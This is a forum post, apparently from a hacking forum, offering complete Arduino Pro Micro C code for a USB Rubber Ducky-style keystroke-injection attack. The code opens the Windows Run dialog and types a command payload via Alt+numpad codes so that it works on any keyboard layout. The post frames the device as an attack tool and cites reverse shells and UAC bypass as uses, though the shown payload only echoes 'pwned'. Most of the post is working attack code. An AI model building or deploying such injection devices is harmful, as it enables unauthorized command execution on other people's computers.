USB Rubby Duck - C

  • Thread starter Kisame
  • Start date
  • Watchers 0
Kisame

Kisame

Kisame Hoshigaki
 
93
Reputation
1
49
18
Drachma
1,533
Rating - 0%
0   0   0
Hello, hello, I'd like to share my work on such a topic as usb rubby duck. To start with theory.

The concept of the USB Rubby Duck attack itself is to emulate a keyboard, there are a bunch of unpretentious PoCs on the Internet
reverse shell, bypass uak (not to be confused with lpe), etc. I want to present to you, in a sense, a modified idea.
My code supports: any keyboard layouts, even if there is no english keyboard on the target machine, automatically enable NUMLOCK,
and generally cool code came out.

The complete code will be at the end of the article, but now we will analyze its parts.

When our 'keyboard' is connected to the system, the latter sends it information about the state of CapsLock, ScrollLock, NumLock, we need the latter,
we check whether it is turned on, and if not, then we send a turn-on signal, we will need it further



C:
if (!(BootKeyboard.getLeds() & LED_NUM_LOCK)) BootKeyboard.write(KEY_NUM_LOCK);
delay(1500);

Here, by standard, open the Run menu

C:
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
Keyboard.releaseAll();
delay(2500);
Keyboard.write(KEY_BACKSPACE);
delay(500);


The last part of the code is responsible for entering characters using Alt + (ASCII code), everything is simple there, we get the ascii code of the character, decompose it into

composite numbers, and since we received them in the reverse order, we enter them in the opposite, it turns out reversed reversed)

C:
do { int symbol = *command++; while(symbol) { _symbols[_count++] = symbol % 10; symbol /= 10; } Keyboard.press(KEY_LEFT_ALT); delay(15); while(_count-- > 0){ write_numpad_digit(_symbols[_count]); delay(5); } Keyboard.release(KEY_LEFT_ALT); delay(5); Keyboard.releaseAll(); _count = 0; delay(5); } while(*command != 0);


All the code, for compilation you need an Arduino Pro Micro board, it costs 200 rubles, and an Arduino IDE, do not forget to install the HID library in ide

C:
#include "HID-Project.h"
#define PAYLOAD "cmd.exe /c echo pwned & pause"
void write_numpad_digit(int num){ switch (num) { case 0: Keyboard.write(KEYPAD_0); break; case 1: Keyboard.write(KEYPAD_1); break; case 2: Keyboard.write(KEYPAD_2); break; case 3: Keyboard.write(KEYPAD_3); break; case 4: Keyboard.write(KEYPAD_4); break; case 5: Keyboard.write(KEYPAD_5); break; case 6: Keyboard.write(KEYPAD_6); break; case 7: Keyboard.write(KEYPAD_7); break; case 8: Keyboard.write(KEYPAD_8); break; case 9: Keyboard.write(KEYPAD_9); break; }
}
void setup() { char* command = PAYLOAD; BootKeyboard.begin(); delay(1300); if (!(BootKeyboard.getLeds() & LED_NUM_LOCK)) BootKeyboard.write(KEY_NUM_LOCK); //enable numlock button delay(1500); Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); Keyboard.releaseAll(); delay(2500); Keyboard.write(KEY_BACKSPACE); delay(500); int _count = 0; int _symbols[5]; do { int symbol = *command++; while(symbol) { _symbols[_count++] = symbol % 10; symbol /= 10; } Keyboard.press(KEY_LEFT_ALT); delay(15); while(_count-- > 0){ write_numpad_digit(_symbols[_count]); delay(5); } Keyboard.release(KEY_LEFT_ALT); delay(5); Keyboard.releaseAll(); _count = 0; delay(5); } while(*command != 0); delay(50); Keyboard.write(KEY_RETURN);
}
void loop() { return;
}
 
  • Watchers 0
  • Top